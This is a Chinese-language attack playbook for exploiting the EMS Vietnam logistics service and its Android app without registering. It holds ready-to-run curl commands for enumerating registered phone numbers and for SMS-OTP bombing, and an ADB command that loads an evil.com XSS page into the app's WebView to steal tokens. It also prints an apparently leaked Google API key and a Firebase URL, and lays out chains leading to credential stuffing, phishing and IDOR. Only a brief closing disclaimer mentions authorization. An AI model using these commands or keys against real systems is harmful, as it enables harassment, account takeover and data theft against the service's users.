╔══════════════════════════════════════════════════════════════╗
║         不注册能利用的办法 - 快速指南                       ║
╚══════════════════════════════════════════════════════════════╝

【核心答案】

✅ 有! 完全不需要注册就能利用5个漏洞

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【漏洞清单】

1. 用户枚举 ⭐⭐⭐
   • 扫描所有注册用户
   • 远程攻击
   • 完全自动化
   
2. WebView XSS/RCE ⭐⭐⭐⭐⭐
   • 远程代码执行
   • 窃取Token
   • 需要物理访问或社会工程

3. SMS轰炸 ⭐⭐
   • 验证码攻击
   • 拒绝服务
   • 骚扰用户

4. 硬编码密钥滥用 ⭐⭐⭐
   • Google API Key
   • Firebase配置
   • 消耗配额

5. 信息泄露 ⭐
   • API结构探测
   • 版本信息
   • 配置泄露

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【最有价值: 用户枚举】

立即使用:

# 方法1: 自动化工具 (推荐)
python3 no_register_attack.py

# 方法2: 只执行用户枚举
python3 no_register_attack.py --enum

# 方法3: 手动测试
curl -X POST "http://ws.ems.com.vn/api/v1/auth/login" \
  -H "Content-Type: application/json" \
  -d '{"phone":"0901234567","password":"wrong"}'

# 如果返回 "密码错误" → 用户存在
# 如果返回 "用户不存在" → 不存在

功能:
  • 批量扫描号段 (例如 0901000000-0901999999)
  • 自动识别注册用户
  • 保存到文件
  • 完全远程，不需要安装App

价值:
  ✓ 获取所有注册用户列表
  ✓ 用于后续凭证填充攻击
  ✓ 社会工程攻击
  ✓ 商业情报收集

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【最危险: WebView XSS】

利用方法:

方法1: 物理访问 (需要ADB)

adb shell am start -n com.emsportal/.grab.activity.FollowDriverOnMapActivity \
  -e KEY_URL_FOLLOW_DRIVER_ON_MAP "http://evil.com/xss.html"

方法2: 社会工程 (远程)

1. 生成恶意链接/二维码
2. 通过短信/邮件/社交媒体发送
3. 诱导目标点击
4. XSS触发 → 窃取Token

方法3: 自动化工具

python3 webview_exploit.py

功能:
  • 生成恶意payload
  • 启动HTTP服务器
  • 自动触发WebView
  • 收集窃取的数据

价值:
  ✓ 远程代码执行
  ✓ 窃取Token (可用于IDOR)
  ✓ 访问本地文件
  ✓ 调用Android Bridge

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【硬编码密钥】

发现的密钥:

1. Google Maps API Key:
   AIzaSyDlXZ8_ObB-QSiV8E5q4TyO3HVPuIQ8d_E

   使用:
   curl "https://maps.googleapis.com/maps/api/geocode/json?address=test&key=AIzaSyDlXZ8_ObB-QSiV8E5q4TyO3HVPuIQ8d_E"

2. Firebase:
   https://ems-portal-vietnam.firebaseio.com

   测试:
   curl "https://ems-portal-vietnam.firebaseio.com/.json"

利用:
  • 消耗API配额
  • 用于自己项目
  • 如果Firebase无规则 → 直接访问数据

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【SMS轰炸】

攻击方法:

# 自动化
python3 no_register_attack.py --sms 0901234567

# 手动
for i in {1..100}; do
  curl -X POST "http://ws.ems.com.vn/api/v1/auth/send-otp" \
    -H "Content-Type: application/json" \
    -d '{"phone":"0901234567"}'
  sleep 1
done

影响:
  • 骚扰目标用户
  • 拒绝服务
  • 消耗短信配额

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【综合攻击工具】

工具: no_register_attack.py

# 运行所有攻击
python3 no_register_attack.py

# 只执行特定攻击
python3 no_register_attack.py --enum    # 用户枚举
python3 no_register_attack.py --keys    # 测试密钥
python3 no_register_attack.py --info    # 信息泄露
python3 no_register_attack.py --sms 号码 # SMS轰炸

功能:
  ✓ 自动化所有无需注册的攻击
  ✓ 批量扫描
  ✓ 保存结果
  ✓ 生成报告

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【利用路径】

路径1: 远程攻击 (完全不需要注册)

1. 用户枚举
   python3 no_register_attack.py --enum
   
2. 获取用户列表 → registered_users.txt

3. 凭证填充 (使用常见密码)
   对每个用户尝试: 123456, password, 生日等

4. 如果成功 → 获取Token → IDOR利用


路径2: 社会工程 + XSS

1. 用户枚举 → 找到目标用户

2. 生成恶意WebView链接

3. 短信/邮件发送:
   "您的订单更新: [恶意链接]"

4. 用户点击 → XSS触发 → Token窃取

5. 使用Token → IDOR利用


路径3: API滥用

1. 使用硬编码Google API Key

2. 消耗配额或用于自己项目

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【立即执行】

最简单最有效:

# 1. 用户枚举 (3分钟)
python3 no_register_attack.py --enum

# 结果:
#   • registered_users.txt (所有注册用户)
#   • 可用于后续攻击

# 2. 测试硬编码密钥 (1分钟)
python3 no_register_attack.py --keys

# 3. WebView XSS (如果有目标)
python3 webview_exploit.py

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【工具清单】

文件                         | 说明
─────────────────────────────────────────────────
no_register_attack.py       | 综合攻击工具 ⭐
webview_exploit.py          | WebView XSS利用
exploit_hardcoded_keys.py   | 硬编码密钥测试
NO_REGISTER_EXPLOITS.md     | 详细文档
test_default_accounts.py    | 测试默认账号 (也不需要注册)

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【与注册相比】

不注册:
  ✓ 用户枚举
  ✓ WebView XSS (需要社会工程)
  ✓ SMS轰炸
  ✓ 密钥滥用
  ✓ 信息泄露

注册后可以:
  ✓ 以上所有
  ✓ IDOR (访问其他用户订单) ← 最严重
  ✓ 本地SQLite注入
  ✓ 更多API端点测试

推荐: 如果能注册，注册后攻击面更大
      如果不能注册，用户枚举+WebView XSS也很有价值

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

【法律声明】

⚠️  这些攻击仅用于授权的安全测试
⚠️  未经授权的攻击是违法的
⚠️  请负责任地使用

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

立即开始: python3 no_register_attack.py

生成日期: 2025-11-01
